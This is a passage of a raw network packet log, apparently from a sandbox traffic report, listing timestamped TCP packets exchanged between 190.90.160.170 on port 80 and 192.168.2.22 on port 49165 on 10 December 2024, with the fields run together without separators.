                          Dec 10, 2024 14:20:54.347207069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.347259998 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.347670078 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.347718000 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.347745895 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.347759962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.348429918 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.348481894 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.348769903 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.348814964 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.349309921 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.349368095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.349385023 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.349421024 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350016117 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350085020 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350114107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350162029 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350800991 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350850105 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350888014 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350939989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.351592064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.351603985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.351716995 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.352528095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.352540970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.352585077 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.352585077 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.353143930 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.353154898 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.353223085 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.353928089 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.353940964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.354038954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.354705095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.354717970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.354757071 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.355536938 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.355551958 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.355604887 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.356224060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.356241941 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.356273890 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.356295109 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357048988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357062101 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357116938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357116938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357774973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357826948 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357827902 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357887983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.358702898 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.358768940 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.358768940 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.358899117 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.359509945 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.359524012 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.359570026 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.360166073 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.360223055 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.360248089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.360261917 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.360989094 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361004114 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361054897 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.361068010 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.361735106 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361804962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.361846924 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361891031 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.362504959 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.362515926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.362565041 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.363424063 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.363436937 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.363490105 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.364046097 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364140987 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.364178896 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364226103 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.364882946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364895105 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364926100 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.365669012 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.365680933 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.365722895 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.366637945 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.366650105 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.366708040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.366708040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.367170095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367224932 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.367233038 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367290020 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.367882967 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367894888 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367938042 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.369381905 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.369395018 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.369451046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.369451046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.369960070 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.369971991 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.370016098 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.370016098 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.370307922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.370321035 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.370349884 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.370367050 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.371068001 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.371078968 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.371118069 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.371706009 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.371767044 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.372009039 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.372057915 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.372564077 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.372627974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.372651100 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.372720957 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.373434067 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.373446941 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.373482943 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.373544931 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.374039888 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.374150991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.379409075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379503965 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.379559040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379743099 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379755974 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379757881 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.379792929 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.380903959 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.380914927 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.380973101 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.381264925 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.381331921 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528007984 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528105974 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528285027 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528331995 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528352976 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528369904 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528369904 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528698921 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528762102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528796911 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528847933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.529467106 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.529572010 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.529643059 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.529685974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.530333996 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.530345917 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.530390024 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.530998945 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531075954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.531230927 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531299114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.531872988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531892061 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531924009 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.531975031 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.532562971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.532619953 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.532789946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.532840967 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.533494949 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.533554077 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.533560991 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.533626080 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.534574986 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.534621954 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.534642935 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.534687042 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535155058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535219908 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535222054 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535279989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535689116 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535763979 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535798073 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535868883 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.536767960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.536811113 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.536900043 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.536947012 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.537484884 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.537497044 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.537540913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.537540913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.537986040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538081884 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.538280964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538355112 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.538808107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538893938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.538938999 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538985968 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.539554119 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.539617062 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.539760113 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.539814949 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.540323973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.540364981 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.540373087 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.540432930 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.541146040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.541208982 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.541224003 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.541265011 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.541974068 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.542032003 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.542035103 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.542084932 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.542985916 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.542998075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.543040991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.543492079 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.543541908 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.543575048 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.543623924 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.544327021 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.544377089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.544625998 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.544691086 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.544989109 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545063019 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.545389891 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545468092 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.545773983 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545787096 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545836926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.546554089 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.546566963 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.546627045 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.547408104 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.547463894 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.548171997 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.548183918 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.548201084 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.548232079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.548232079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.549087048 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549099922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549150944 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.549720049 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549732924 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549771070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.549771070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.550465107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.550477982 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.550514936 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.551254988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.551281929 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.551321983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.551321983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552090883 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552103043 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552146912 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552146912 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552799940 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552813053 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552850962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552850962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.553554058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.553570986 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.553616047 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.554398060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.554413080 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.554447889 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.554464102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.555103064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555114985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555169106 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.555854082 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555866003 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555911064 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.555911064 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.556696892 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.556710005 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.556755066 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.557382107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.557431936 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.557439089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.557482004 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.558259964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.936218977 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.936810970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.936868906 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.936908960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.936949968 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.937552929 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.937593937 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.937959909 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.938015938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.938626051 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.938638926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.938688040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.939265013 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.939280033 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.939320087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.939320087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.939960957 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.940018892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.940042019 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.940078020 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.940939903 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.940990925 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.940994024 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.941059113 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.941523075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.941534042 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.941577911 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.941579103 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.942235947 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.942289114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.942637920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.942679882 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.943094969 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.943108082 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.943161964 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.943996906 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944010973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944061041 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.944709063 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944720984 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944758892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.945400953 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.945413113 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.945483923 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.946155071 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.946209908 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.946213961 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.946265936 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.946959019 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947026014 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.947346926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947392941 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.947772980 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947784901 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947817087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.947839022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.948713064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.948725939 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.948765039 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.949575901 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.949588060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.949640989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.949640989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.950265884 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.950334072 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.950344086 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.950395107 CET4916580192.168.2.22190.90.160.170
